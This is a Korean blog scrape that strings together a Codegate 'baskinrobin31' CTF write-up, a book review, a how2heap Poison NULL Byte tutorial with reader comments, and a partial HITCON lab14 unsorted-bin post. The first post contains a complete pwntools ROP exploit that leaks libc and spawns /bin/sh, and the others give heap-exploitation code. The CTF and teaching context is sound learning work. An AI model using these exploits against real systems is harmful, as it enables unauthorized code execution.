1. 시작하기전에...


한동안 바빠서 블로그 업데이트를 통..하지못했었는데, 새해도 되었으니 다시 시작해보려고합니다.

원래는 how2heap을 계속 올려야하는데, 지난 코드게이트 문제들을 리뷰해볼 기회가 생겨서 작년 문제 중 하나를 선정하였습니다.



2. 정적 분석


file 명령어 실행 결과 바이너리가 x64, dynamaically linked임을 알 수 있습니다.



checksec를 통해 Mitigation을 확인해보니 카나리도 없고, pie도 안걸려있습니다. Patial RELRO라 GOT도 덮어쓸 수 있습니다.


바이너리를 실행하면 술자리 게임 베스킨라빈스 31이 시작됩니다. 각 턴마다 1~3의 숫자를 입력받고, 남은 숫자가 표시됩니다. 



IDA로 디컴파일해보겠습니다.


main()


- 실행화면에서 봤던 문구들("### ~~ ###")들을 출력하고 남은 숫자(remain_val)가 0보다 클때 반복문을 실행합니다.

- 반복문 안에서 your_turn()함수가 제대로 끝났는 지 검사하는 is_your_turn_done의 값으로 분기를 실행합니다.

- my_turn()은 프로그램이 턴을 수행하는 기능이 구현되어있습니다.

- your_turn()은 유저의 입력으로 턴을 수행하는 기능이 구현되어있습니다.

- 유저가 이겼을 경우를 의미하는 것같은 분기문에서 힌트가 ROP라고 알려주고있습니다.



your_turn()


- 남은 수를 의미하는 remain_val의 포인터를 함수의 인자로 입력받습니다.

- 유저로부터 입력받은 숫자를 저장하는 변수가 150byte로 되어있습니다.

- 하지만 입력은 400byte까지 받을 수 있습니다. -> 스택 버퍼오버플로우가 발생하게됩니다.



helper()

디컴파일 후 함수목록을 잘 보면 helper()함수가 있습니다. hex ray로는 볼수 없고, 어셈코드만 볼 수 있습니다.

어셈코드를 보면 스택프레임 코드를 제외하면 pop rdi, pop rsi, pop rdx 코드 밖에 없습니다.


pop rdi, pop rsi, pop rdx, retn 가젯은 x64 rop에서 pppr로 사용하는 꼭 필요한 가젯입니다.

x64 함수 호출 규약은 x86 함수 호출 규약과 다르기때문에 rop 코드도 다른 부분이 있습니다.


x64 함수 호출 규약에 관한 자세한 내용은 아래 링크를 참조하세요.

링크 : https://kkamagui.tistory.com/811


2. 동적 분석

바이너리 실행 중 your_turn() 함수에서 "a" * 8을 입력한 다음 스택을 보겠습니다.


입력 값을 저장하는 버퍼의 주소는 0x7ffffffdb90부터 시작하고, 리턴 주소가 저장 된 주소는 0x7ffffffdc48에 저장되어있습니다.


따라서 버퍼 주소 - 리턴 주소가 저장된 주소는 0xb8(184)이고, 카나리가 존재하지 않기때문에 0xb8개의 dummy이 후 rop코드를 시작하면 됩니다.

 

3. exploit

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98


from pwn import *

p = process('./baskinrobin31')

e = ELF('./baskinrobin31')

libc = ELF("./libc.so.6")

context.log_level = 'debug'

def launch_gdb(p):

   context.terminal = ['gnome-terminal', '-x', 'sh', '-c']

   gdb.attach(proc.pidof(p)[0])

#find plt & got address

log.info("found address of read plt : %s" % hex(e.plt["read"]))

read_plt = e.plt["read"]

log.info("found address of write plt : %s" % hex(e.plt["write"]))

write_plt = e.plt["write"]

log.info("found address of puts plt : %s" % hex(e.plt["puts"]))

puts_plt = e.plt["puts"]

log.info("found address of puts got : %s" % hex(e.got["puts"]))

puts_got = e.got["puts"]

#real address of read func - real address of system func

puts_system_offset = libc.symbols['puts'] - libc.symbols['system']

'''

21 .dynamic      000001d0 0000000000601e28  0000000000601e28 00001e28 2**3

24 .data         00000010 0000000000602078  0000000000602078 00002078 2**3

25 .bss          00000020 0000000000602090  0000000000602090 00002088 2**4

'''

#binsh addr

binsh_addr = 0x602090 + 0x10

binsh = "/bin/sh"

log.info("puts to system offset : %s" % hex(puts_system_offset))

#0x0040087a: pop rdi ; pop rsi ; pop rdx ; ret  ; (1 found)

pppr = 0x0040087a

call_your_turn = 0x400AE5

p.recvuntil("How many numbers do you want to take ? (1-3)\n")

#leak puts got

payload  = "a"*184

payload += p64(pppr)

payload += p64(1)

payload += p64(puts_got)

payload += p64(len(str(puts_got)))

payload += p64(write_plt)

#call your turn again

payload += p64(call_your_turn)  

#

payload2 = "a"*184

payload2 += p64(pppr)

payload2 += p64(0)

payload2 += p64(puts_got)

payload2 += p64(0x8)

payload2 += p64(read_plt)

payload2 += p64(pppr)

payload2 += p64(0)

payload2 += p64(binsh_addr)

payload2 += p64(len(str(binsh)))

payload2 += p64(read_plt)

payload2 += p64(pppr)

payload2 += p64(binsh_addr)

payload2 += p64(1)

payload2 += p64(1)

payload2 += p64(puts_plt)

p.sendline(payload)

d = p.recvuntil("Don't break the rules...:(")

p.recv(2)

puts = p.recv(7) + "\x00"

puts = u64(puts)

p.sendline(payload2)

log.info("puts = 0x%x" % puts)

system_addr = puts - puts_system_offset

log.info("system = 0x%x" % system_addr)

p.recvuntil("How many numbers do you want to take ? (1-3)\n")

p.send(p64(system_addr))

p.sendline(binsh)

p.interactive()

Colored by Color Scripter

cs


exploit 코드의 내용 개요는 다음과 같습니다.


사전과정

1. 호출하고 싶은 함수들의 plt 찾기(read, write, puts)

2. got를 덮을 함수의 got 찾기(puts)

3. 필요한 가젯과 오프셋 찾기(pppr, binsh_addr, puts_system_offset, call_your_turn)


ROP payload

1. read()함수를 호출하여 puts got에 있는 값을 알아내기

2. your_turn()를 호출해서 puts의 got에 system함수 got주소 쓰기

3. "/bin/sh"문자열 쓰기

4. puts호출해서 system함수 실행시키기


x64 ROP

앞서 말씀드린바와 같이 x64의 함수 호출 규약은 x86과 달라서 rop코드의 구성이 조금 다릅니다.

x64 리눅스에서 함수에 파라미터를 전달할 때, RDI, RSI, RDX, RCX, R8, R9의 순으로 전달하며 이 이상은 x86과 동일하게

스택을 이용해서 전달합니다.


따라서 x64에서 파라미터에 값을 전달하기 위해 pppr을 먼저 호출해서 함수 호출 전 파라미터를 세팅해야합니다.


코드 설명

13 ~ 24라인은 pwntools의 기능을 이용해 바이너리에서 사용하는 libc 함수들의 plt와 got를 구합니다.


27라인에서는 pwntools를 이용해 libc에 있는 puts와 system의 symbol offset을 계산합니다. 여기서 계산한 offset을 이용해

나중에 puts의 got에 써져있는 주소로 system의 주소를 계산할 수 있습니다.


50 ~ 56라인은 puts의 got에 써있는 주소를 릭하기 위한 payload입니다. 

59라인에서 다시 your_turn()함수를 호출하여 입력을 받을 수 있도록합니다.


62 ~ 67라인에서는 계산한 system의 주소를 puts의 got에 덮어쓰도록 합니다.


69 ~ 73라인에서는 bss영역 중 선정한 공간에 "/bin/sh"문자열을 저장합니다.


75 ~ 79라인에서 system함수를 호출하여 exploit을 완성합니다.


83 ~ 86라인은 50 ~ 56라인에서 릭한 puts의 got에 써있는 주소를 저장합니다.

90 ~ 92라인은 앞서 계산한 offset을 이용해 system함수의 실제 주소를 계산합니다.


95라인은  62 ~ 67라인에서 puts의 got에 덮어쓸 system의 주소를 전송합니다.

96라인은 69 ~ 73라인에서 "/bin/sh"문자열을 저장할 수 있도록 문자열을 전송합니다.


4. exploit 결과


한동안 바쁘단 핑계로 미루다보니 책 후기가 너무 세 권이나 밀려버렸네요. 더 미루다가는 아예 안올리게 될 것 같아서 오랜만에 후기를 남겨봅니다. 

이번에 포스팅 할 책은 한동일 작가님의 책 라틴어 수업 입니다.




1. 계기

처음에 회사 팀장님께 추천을 받고 이런 책이 있구나 하고 관심을 갖고 있었습니다. 얼마 지나지 않아 팀장님께서 정말 좋은 책이라고 하시며 선물을 해주셔서 본격적으로 읽게 되었습니다.(감사합니다!) 나중에보니 최근 베스트 셀러 순위권에 위치하고 있더라고요.

  


2. 내용

책은 몇 년전 서강대에서 한동일 작가님이 강의하셨던 수업인 라틴어 수업에서 다룬 내용으로 이루어져있습니다.

'라틴어 수업' 이라는 제목답게 매 장의 제목이 라틴어로 되어있으며, 장의 앞 부분에서는 제목이 이루고있는 구조에 대한 설명과 각 단어들의 해석으로 시작됩니다.


이 책의 내용에 기본이 된 강의가 유명하고, 책이 베스트셀러에 오른 이유는 라틴어에 대한 해설 때문이 아니라 라틴어 문장에 얽힌 다양한 이야기들이 있기 때문이라고 생각합니다.

라틴어 문장으로 시작하여 고대 로마인들의 관습, 음식, 생각, 놀이, 작가님의 유학시절 이야기와 같은 재미있는 소재로 옮겨 간 다음 관련 된 생각해 볼 주제 혹은 교훈으로 끝을 맺습니다. 그 중 인상 깊었던 주제 한 가지를 소개 해보려고 합니다.


- 나는 공부하는 노동자입니다.

이 포스팅의 부제로 선정한만큼 가장 인상깊었던 챕터 한가지를 뽑아보라고 한다면 이 챕터를 뽑고 싶습니다.

이 부분을 읽으면서 마치 저격을 당하고 있는 느낌이 들었거든요.


시작부분에서 공부라는 것이 고통스럽고 괴로운 과정이라는 것을 인정하고 시작합니다.

공부를 하면서 완벽하고 더 열심히 해야한다는 강박감, 실패 후 좌절하고 자책하는 일이 일어나고 지치게 된다는 말에 많은 공감을 했습니다.     


저 또한 올해가 시작되면서부터 조급한 마음이들고 더 열심히 해야한다는 생각을 하게되면서 슬슬 '지친다' 라는 생각이 들기 시작했고, 때마침 이 부분을 읽게 된 것이죠. 

사실 지금도 완전히 나아진 상태는 아니지만, 이 책을 읽고나서 마음가짐을 다잡아보려고 노력하고 있습니다.


앞 부분에서 공부를 노동에 비유했다면 뒷 부분에서는 장기 레이스에 비유합니다. 장기 레이스를 끝까지 마치려면 페이스 조절이 필요하죠.

공부도 역시 항상 열심히 해야한다는 생각으로 휴식조차 죄를 지은 것처럼 대한다면 오래 할 수 없다는 것입니다.


결론부에서는 공부를 비롯한 어떤 일에 있어서 무비판적으로 안일한 태도를 갖는 것을 경계하는 대신 스스로를 응원하고 템포를 조절해나갈 것, 

자신의 리듬을 알고 좋은 습관을 만들 것을 당부합니다.  


3. 마무리

포스팅에서는 가장 인상깊었던 챕터 한 가지만 뽑았지만, 어머님에게 보냈던 편지가 쓰여있는 '오늘은 나에게, 내일은 너에게' 와 

오늘, 지금 여기에서 행복을 빌어주는 '오늘 하루를 즐겨라(카르페 디엠)' 과 같은 좋지만 소개하지 못한 여러 이야기들이 있으니 꼭 읽어보시길 바랍니다.


라틴어 수업은 시기적절한 때 읽게 되어 저에게 크고 작은 변화를 준 책입니다.

'일상 > BooK' 카테고리의 다른 글

라틴어 수업 - 나는 공부하는 노동자입니다.  (0) 2018.03.22
죄와 벌  (0) 2018.02.26
우리는 언젠가 만난다.  (0) 2018.01.15
시민의 교양  (0) 2018.01.11

1. 시작하기전에...

오늘부터는 how2heap 시리즈에 소개되어 있는 취약점들을 살펴보려고합니다. how2heap은 heap관련 취약점들의 원리를 소스코드와 

주석으로 설명해 놓은 프로젝트입니다.


[참조] https://github.com/shellphish/how2heap


전에 포스팅 했던 HITCON Training의 lab12와 lab14에서 다룬적이 있는 fastbin attack과 unsorted bin attack을 제외한 나머지를 다룰 예정이고,

이번 포스팅과 앞으로 소개 될 취약점들은 아래의 사이트를 참조하려고 합니다.


[참조] https://www.lazenca.net/display/TEC/Heap+Exploitation

[참조] https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/


2. Poison NULL Byte

Poison NULL Byte는 Off-by-one error에 기본을 둔 heap 관련 취약점입니다.

이 취약점을 간단히 설명하면 이미 할당된 heap을 새로 할당받는 heap공간에 포함시켜 할당받아 새로운 값으로 덮을 수 있는 취약점 입니다.


2.1 조건

 - 공격자에 의해 다음과 같은 Heap 영역을 할당, 해제 할 수 있어야 합니다.

- 0x200 이상의 heap 영역 : 공격 대상 heap영역

- Fast bin 이상의 Heap 영역(Heap size : 0x80이상) : 공격 대상 영역에 할당 Heap 영역


 - 공격자에 의해 Free chunk의 size영역에 1byte를 NULL로 변경 할 수 있어야 합니다.

 - 공격자에 의해 Free chunk의 size보다 작은 heap영역을 2개 할당 할 수 있어야합니다.

- Fast chunk는 사용할 수 없습니다.


[참조] https://www.lazenca.net/display/TEC/Poison+null+byte


2.2 Off-by-one

Poison NULL Byte에 사용되는 Off-by-one에 대해 간단히 알고 넘어가도록 하겠습니다.

Off-by-one error는 버퍼 크기의 경계 검사를 잘 못해서 한 바이트를 더 쓸 수 있게 되는 취약점입니다.


[참조]https://en.wikipedia.org/wiki/Off-by-one_error


예시로 다음의 코드를 봅시다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <stdio.h>
 
int main(int argc,char *argv[])
{
    char buf[1024];
    
    if(strlen(argv[1]) > 1024) {
        printf("BOF is occured\n");
        return -1;
    }
    
    strcpy(buf, argv[1]);
    printf("buf = %s\n", buf);    
 
    return 0;
}



위 코드에서는 1024바이트 크기를 갖는 buf변수가 존재하고 있습니다. 프로그램에 인자를 넣고 실행하면 인자를 이 buf에 복사하고 출력해줍니다.

단, 인자의 길이가 1024보다 크다면 BOF is occured를 출력하지요. 


언뜻 보기에는 BOF가 발생하지 않을 것으로 보이지만 여기서 Off-by-one 이 발생합니다.

strlen()함수는 문자열 길이를 리턴해 줄 때 NULL바이트를 제외하여 리턴해줍니다. 따라서, 정확히 인자의 크기가 1024만큼의 문자열이 전달 되는 경우

BOF검사 분기를 넘어서 복사과정을 거치는데, 실제 buf에 복사되는 값의 길이는 1024 + NULL이 되어 1025바이트를 쓸 수 있게 됩니다.


이처럼 잘못된 크기 검사로 인해 한 바이트를 더 쓸 수 있게 되는 취약점이 Off-by-one 입니다.

해당 취약점과 관련해 자세하게 설명된 블로그가 있어 아래 참조 링크 드립니다.


[참조] http://s0ngsari.tistory.com/entry/Offbyone



2.3 how2heap - Poison NULL Byte

본격적으로 how2heap에 소개되어 있는 Poison NULL Byte의 코드를 가지고 살펴보도록 하겠습니다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
    uint8_t* a;
    uint8_t* b;
    uint8_t* c;
    uint8_t* b1; 
    uint8_t* b2; 
    uint8_t* d;
 
    fprintf(stderr, "We allocate 0x100 bytes for 'a'.\n");
    a = (uint8_t*malloc(0x100);
    fprintf(stderr, "a: %p\n", a); 
    int real_a_size = malloc_usable_size(a);
    fprintf(stderr, "Since we want to overflow 'a', we need to know the 'real' size of 'a' "
        "(it may be more than 0x100 because of rounding): %#x\n", real_a_size);
 
    /* chunk size attribute cannot have a least significant byte with a value of 0x00.
     * the least significant byte of this will be 0x10, because the size of the chunk includes
     * the amount requested plus some amount required for the metadata. */
    b = (uint8_t*malloc(0x200);
 
    fprintf(stderr, "b: %p\n", b); 
 
    c = (uint8_t*malloc(0x100);
    fprintf(stderr, "c: %p\n", c); 
 
    uint64_t* b_size_ptr = (uint64_t*)(b - 8); 
 



소스코드가 길어 부분 부분 잘라서 설명하겠습니다.

최초에 변수 a, b, c, b1, b2, d가 선언 되어 있는데 이 변수들은 Poison NULL Byte를 실행하기 위해 필요한 heap 변수들입니다.

각 변수들의 용도는 아래와 같습니다.


변수명 

용도 

Off-by-one을 사용할 수 있게 해줌 

Poison NULL Byte가 이루어지는 공간 

Poison NULL Byte로 인해 병합되는 heap 

Poison NULL Byte의 결과로 할당 받는 heap 

b1 

b해제 후 b공간에서 쪼개져 할당받는 heap 

b2 

b해제 후 b공간에서 쪼개져 할당받는 heap

Poison NULL Byte의 Victim


뒤에 진행되는 사항들을 보면서 헷갈릴 수 있는데 표에 소개된 내용을 생각하시면서 보면 조금 더 수월하게 보실 수 있을 것 같습니다.

위의 코드 내용을 정리해보자면 a에 0x100, b에 0x200, c에 0x100만큼 메모리를 할당 했습니다.


그리고 추가로 살펴봐야할 것은 11, 12라인인데요

malloc_usable_size()함수를 통해 메모리를 할당 받은 a에 실제로 사용할 수 있는 크기를 알아보고 있습니다. 라운딩때문에 0x100보다 클 것이라고 이야기 하면서요.



실제로 확인해 보니 a의 usable size는 0x108인 것을 알 수 있습니다. 


※ 위의 실행 결과로 보여드린 주소와는 다르지만 짧게 예시를 든 주소이니, 신경쓰시지 않아도 됩니다.


위 그림처럼 a는 코드에서 의도한 size보다 8바이트 더 큰 값을 사용할 수 있는 상태가 될 것입니다. 그리고 이 8바이트는 b의 prev_size영역이 됩니다.

여기서 한 바이트를 더 쓴다면 b의 chunk size에 영향을 줄 수 있는 상태가 되겠지요. 일단 여기까지만 생각하시고 다음으로 넘어가 보도록 하겠습니다.


  

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
    uint64_t* b_size_ptr = (uint64_t*)(b - 8); 
 
 
    fprintf(stderr, "In newer versions of glibc we will need to have our updated size inside b itself to pass "
        "the check 'chunksize(P) != prev_size (next_chunk(P))'\n");
    // we set this location to 0x200 since 0x200 == (0x211 & 0xff00)
    // which is the value of b.size after its first byte has been overwritten with a NULL byte
    *(size_t*)(b+0x1f0= 0x200;
 
    // this technique works by overwriting the size metadata of a free chunk
    free(b);
    
    fprintf(stderr, "b.size: %#lx\n"*b_size_ptr);
    fprintf(stderr, "b.size is: (0x200 + 0x10) | prev_in_use\n");
    fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
    a[real_a_size] = 0// <--- THIS IS THE "EXPLOITED BUG"
    fprintf(stderr, "b.size: %#lx\n"*b_size_ptr);
 
    uint64_t* c_prev_size_ptr = ((uint64_t*)c)-2;
    fprintf(stderr, "c.prev_size is %#lx\n",*c_prev_size_ptr);



여기서부터가 중요한데요, Poison NULL Byte를 위해 b의 chunk size를 0x200으로 만들어 주어야 합니다. 그런데 문제가 glibc에서

chunksize(P)가 prev_size(next_chunk(P))가 같은 지를 비교한다고 하네요.


b의 next_chunk의 주소는 어떻게 계산되는 지 살펴보겠습니다.


Poison NULL Byte공격을 고려하지 않았을 때

0x7120(address of b data area) - 0x10(header size) + 0x210(size of b) = 0x7320 (address of c)


c의 주소가 정확히 계산되어 나옵니다. 그리곤 c의 prev_size와 b의 chunk size필드를 비교해서 일치하는 지를 비교한다는 이야기입니다.


Poison NULL Byte를 위해 b의 chunk size를 0x200으로 만들어 주어야 한다면 거기에 대응하는 주소공간에 가상으로 prev_size인 것처럼 0x200

써주어야합니다.


0x7120(address of b data area) - 0x10(header size) + 0x200(size of fake b) = 0x7310 (address of fake chunk)

이런 이유로 b의 주소에 0x1f0을 더한 값인 0x7310에 0x200을 써주었습니다.


그 다음에 b를 해제했습니다. 그리고 Off-by-one 취약점을 이용해 a[real_size] => a[0x108]에 한 바이트를 0(NULL)로 써주었습니다.

그럼 b의 chunk size는 0x211 에서 한 바이트가 0으로 바뀌었으니, 0x200으로 바뀌게 됩니다.



c의 prev_size는 건드리지 않았으니, 0x211에서 INUSE flag만 0으로 바뀌어 0x210이 된 모습입니다.



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
    fprintf(stderr, "We will pass the check since chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n",
        *((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8))));
    b1 = malloc(0x100);
 
    fprintf(stderr, "b1: %p\n",b1);
    fprintf(stderr, "Now we malloc 'b1'. It will be placed where 'b' was. "
        "At this point c.prev_size should have been updated, but it was not: %lx\n",*c_prev_size_ptr);
    fprintf(stderr, "Interestingly, the updated value of c.prev_size has been written 0x10 bytes "
        "before c.prev_size: %lx\n",*(((uint64_t*)c)-4));
    fprintf(stderr, "We malloc 'b2', our 'victim' chunk.\n");
    // Typically b2 (the victim) will be a structure with valuable pointers that we want to control
 
    b2 = malloc(0x80);
    fprintf(stderr, "b2: %p\n",b2);
 
    memset(b2,'B',0x80);
    fprintf(stderr, "Current b2 content:\n%s\n",b2);



위에서 이야기한 chunksize(P)와 prev_size(next_chunk(P))가 같은 지를 검사하는 부분에서 에러 없이 통과를 하였습니다.

이후 새로 b1을 할당 0x100만큼 할당 받았습니다.


b1은 b의 시작부분에서부터 할당을 받았습니다. b1을 할당 받은 후 c의 prev_size를 찍어보면 b1에 해당하는 값으로 업데이트가 이루어져야 하지만 이루어지지 않습니다. 그 대신에 우리가 전에 만들었던 fake chunk의 prev_size가 업데이트 된 것을 알 수 있습니다.



이 상태에서 victim chunk인 b2를 0x80만큼 할당 합니다. 그리고 내용을 b로 채워주었습니다.



1
2
3
4
5
6
7
8
9
10
11
12
13
fprintf(stderr, "Now we free 'b1' and 'c': this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");
 
free(b1);
free(c);
 
fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2'.\n");
= malloc(0x300);
fprintf(stderr, "d: %p\n",d);
 
fprintf(stderr, "Now 'd' and 'b2' overlap.\n");
memset(d,'D',0x300);
 
fprintf(stderr, "New b2 content:\n%s\n",b2);



이제 사전 준비는 다 끝났습니다. b1, c의 차례로 free를 하면 b1과 c의 병합이 일어나게 됩니다. 이때, b1과 c1의 사이에 있는 b2의 존재는 잊어버리고 

병합이루어 집니다.


그 이유는 c의 해제가 이루어질 당시 c의 prev_size는 0x210이니, 이전의 메모리가 사용되고 있지 않은 중으로 OS가 판단합니다.(INUSE flag == 0)

때문에 이전의 chunk (prev chunk)와 병합이루어 지게 되죠.

 

c의 prev chunk의 주소를 알아내는 방법은 아래와 같습니다.


0x7320(address of c) - 0x210(prev_size) = 0x7110 


0x7110 부터 c에 해당하는 chunk까지 모두 병합이 이루어지게 되는 것입니다. (이 사이에 b2가 존재하죠)

이렇게 병합된 chunk는 0x300의 메모리 할당 요청에 반환됩니다. 이로써 b2의 내용을 수정할 수 있게 된 것입니다.




소개 된 예제에서는 단순히 변수의 값을 바꾸는 것만으로 소개가 되었는데, b2의 공간이 구조체이고 그 안에 함수포인터가 저장되어있다는 가정이라면

더 멋진 결과도 나올 수 있을 것이라고 생각합니다.


  1. Wooum@n 2019.11.03 11:01 신고

    64bit 우분투에서는 적용이 안되나요?

    예제 만들어서 확인해보고 있는데요.

    청크 두개 만들어서
    앞의 청크를 free했는데
    뒤의 청크의 prev_size 위치에 값이 안바뀌네요.

    gdb로 확인한 모습입니다

    EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
    0x555555555202 <main+157>: mov rax,QWORD PTR [rbp-0x10]
    0x555555555206 <main+161>: mov rdi,rax
    0x555555555209 <main+164>: call 0x555555555030 <free@plt>
    => 0x55555555520e <main+169>: mov rax,QWORD PTR [rbp-0x8]
    0x555555555212 <main+173>: sub rax,0x40
    0x555555555216 <main+177>: mov eax,DWORD PTR [rax]
    0x555555555218 <main+179>: mov esi,eax
    0x55555555521a <main+181>: lea rdi,[rip+0xdf3] # 0x555555556014
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffffe350 --> 0x555555559260 --> 0x0
    0008| 0x7fffffffe358 --> 0x555555559470 ('a' <repeats 80 times>)
    0016| 0x7fffffffe360 --> 0x555555555240 (<__libc_csu_init>: push r15)
    0024| 0x7fffffffe368 --> 0x7ffff7def09b (<__libc_start_main+235>: mov edi,eax)
    0032| 0x7fffffffe370 --> 0x0
    0040| 0x7fffffffe378 --> 0x7fffffffe448 --> 0x7fffffffe6b8 ("/work/pico2019/Ghost_Diary/poc")
    0048| 0x7fffffffe380 --> 0x100040000
    0056| 0x7fffffffe388 --> 0x555555555165 (<main>: push rbp)
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    0x000055555555520e in main ()
    gdb-peda$ x/50wx $1-0x10
    0x555555559250: 0x00000000 0x00000000 0x00000211 0x00000000
    0x555555559260: 0x00000000 0x00000000 0x62626262 0x62626262
    0x555555559270: 0x62626262 0x62626262 0x62626262 0x62626262
    0x555555559280: 0x62626262 0x62626262 0x62626262 0x62626262
    0x555555559290: 0x62626262 0x62626262 0x62626262 0x62626262
    0x5555555592a0: 0x62626262 0x62626262 0x62626262 0x62626262
    0x5555555592b0: 0x62626262 0x62626262 0x62626262 0x62626262
    0x5555555592c0: 0x62626262 0x62626262 0x62626262 0x62626262
    0x5555555592d0: 0x62626262 0x62626262 0x62626262 0x62626262
    0x5555555592e0: 0x62626262 0x62626262 0x62626262 0x62626262
    0x5555555592f0: 0x62626262 0x62626262 0x62626262 0x62626262
    0x555555559300: 0x62626262 0x62626262 0x62626262 0x62626262
    0x555555559310: 0x62626262 0x62626262
    gdb-peda$ x/50wx $1+0x200
    0x555555559460: 0x00000000 0x00000000 0x00000061 0x00000000
    0x555555559470: 0x61616161 0x61616161 0x61616161 0x61616161
    0x555555559480: 0x61616161 0x61616161 0x61616161 0x61616161
    0x555555559490: 0x61616161 0x61616161 0x61616161 0x61616161
    0x5555555594a0: 0x61616161 0x61616161 0x61616161 0x61616161
    0x5555555594b0: 0x61616161 0x61616161 0x61616161 0x61616161
    0x5555555594c0: 0x00000000 0x00000000 0x00000411 0x00000000
    0x5555555594d0: 0x3a3a3161 0x6572703a 0x69735f76 0x3a20657a
    0x5555555594e0: 0x36323620 0x36323632 0x00000a32 0x00000000
    0x5555555594f0: 0x00000000 0x00000000 0x00000000 0x00000000
    0x555555559500: 0x00000000 0x00000000 0x00000000 0x00000000
    0x555555559510: 0x00000000 0x00000000 0x00000000 0x00000000
    0x555555559520: 0x00000000 0x00000000


    61로 채워진게 이전청크고

    62로 채워진게 다음 청크입니다.

    peda의 eip 위치 보면 free가 실행된 직후입니다만

    62로 채워진 청크의 prev_size 위치에 값의 변화가 없네요.

    왜이럴까요

  2. Wooum@n 2019.11.03 11:02 신고

    이건 소스코드 입니다.

    #include <stdio.h>
    #include <malloc.h>
    #include <string.h>

    int main()
    {
    int* b1 = (int*)malloc(0x200);
    int* a1 = (int*)malloc(0x50);
    memset(b1, 'b', 0x200);
    memset(a1, 'a', 0x50);


    //할당된 주소 확인
    printf("b1: %p\n", b1);
    printf("a1: %p\n", a1);


    free(b1);



    return 1;
    }

1. 시작하기전에...

벌써 HITCONT Training의 짝수 마지막 번호 lab14가 되었습니다. lab14는 지난 번 포스팅에서 다루었던 lab12였던 fastbin attack에 이어 

unsorted bin attack을 이용한 문제입니다.


unsorted bin attack에서는 free Chunk(해제된 메모리 영역)에서 bk를 덮어 써 메모리 할당 공간을 컨트롤 한다는 것이 핵심입니다.


1-1. Free Chunk

한번 봤던 구조지만 한번 더 확인해 보도록 하겠습니다. 


Free Chunk의 상위 두 필드는 prev_size와 헤더의 크기를 포함한 자신의 크기를 나타냅니다.


fastbin 같은 경우에는 single linked list이기때문에, forward pointer to next chunk in list(fd)영역에만 값이 쓰여지고 back pointer to next chunk in list(bk)는 필드는 존재하지만 값이 세팅 되지 않았습니다.


하지만 오늘 다룰 unsorted bin에서는 double linked list로 fd와 bk 필드가 모두 사용됩니다.


1
2
3
4
5
6
7
char *= malloc(0x80);
char *= malloc(0x80);
char *= malloc(0x80);
 
free(a);
free(b);
free(c);



위와 같은 코드가 있을 때, unsorted bin은 first fit에 의해 아래와 같은 형태가 됩니다.


  1. head -> c <-> b<-> a -> tail

이 상태에서 각 free chunk에 fd / bk는 이렇게 기록됩니다.


a 의 bk : b의 주소


b의 fd : a의 주소

b의 bk : c의 주소


c의 fd : b의 주소


생각같아서는 a의 fd에 tail의 주소, c의 fd에는 head의 주소 이렇게 저장될 것 같았는데 직접 확인해 보니 알수 없는 값이 메우고 있었습니다. 

무슨 값인 지는 잘 모르겠습니다만, 확실한 건 Tail쪽이 fd이고 Head쪽이 bk이며 Head방향에 있는 chunk부터 검사하여 적합한 사이즈라면 메모리가 할당 됩니다.


그러므로 이때 bk를 조작할 수 있다면, 다음에 할당되는 메모리의 주소를 조작할 수 있다는 점을 이용합니다.



2. C소스

magicheap.c 의 코드 중 중요한 부분만 몇 군데 보겠습니다.


2-1. create_heap()

1. 프로그램 내에서 할당된 heap을 관리하는 전역변수 heaparray가 있습니다. 그 배열에 빈곳을 찾습니다.

2. 사이즈를 입력받아 해당 크기만큼 메모리를 할당합니다.

3. heap의 내용을 입력받아 저장합니다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
void create_heap(){
    int i ;
    char buf[8];
    size_t size = 0;
    for(i = 0 ; i < 10 ; i++){
        if(!heaparray[i]){
            printf("Size of Heap : ");
            read(0,buf,8);
            size = atoi(buf);
            heaparray[i] = (char *)malloc(size);
            if(!heaparray[i]){
                puts("Allocate Error");
                exit(2);
            }
            printf("Content of heap:");
            read_input(heaparray[i],size);
            puts("SuccessFul");
            break ;
        }
    }   
}



2-2. edit_heap()

1. index를 입력받고 index의 유효성 검사를 합니다.

2. index가 유효한 경우 해당 heap이 heaparray에 존재하는지 확인합니다.

3. 존재하는 경우 해당 heap의 사이즈를 입력받고 사이즈만큼 메모리를 수정합니다.

4. heap의 내용을 수정합니다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
void edit_heap(){
    int idx ;
    char buf[4];
    size_t size ;
    printf("Index :");
    read(0,buf,4);
    idx = atoi(buf);
    if(idx < 0 || idx >= 10){
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){
        printf("Size of Heap : ");
        read(0,buf,8);
        size = atoi(buf);
        printf("Content of heap : ");
        read_input(heaparray[idx] ,size);
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}



2-3. delete_heap()

1. index를 입력받아 index의 유효성 검사를 합니다.

2. index가 유효한 경우 해당 heap이 리스트에 존재하는지 확인 합니다.

3. 존재하는 경우 해당 heap을 메모리 해제 합니다.

4. heaparray에 저장되어 있는 포인터를 NULL로 만들어 줍니다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
void delete_heap(){
    int idx ;
    char buf[4];
    printf("Index :");
    read(0,buf,4);
    idx = atoi(buf);
    if(idx < 0 || idx >= 10){
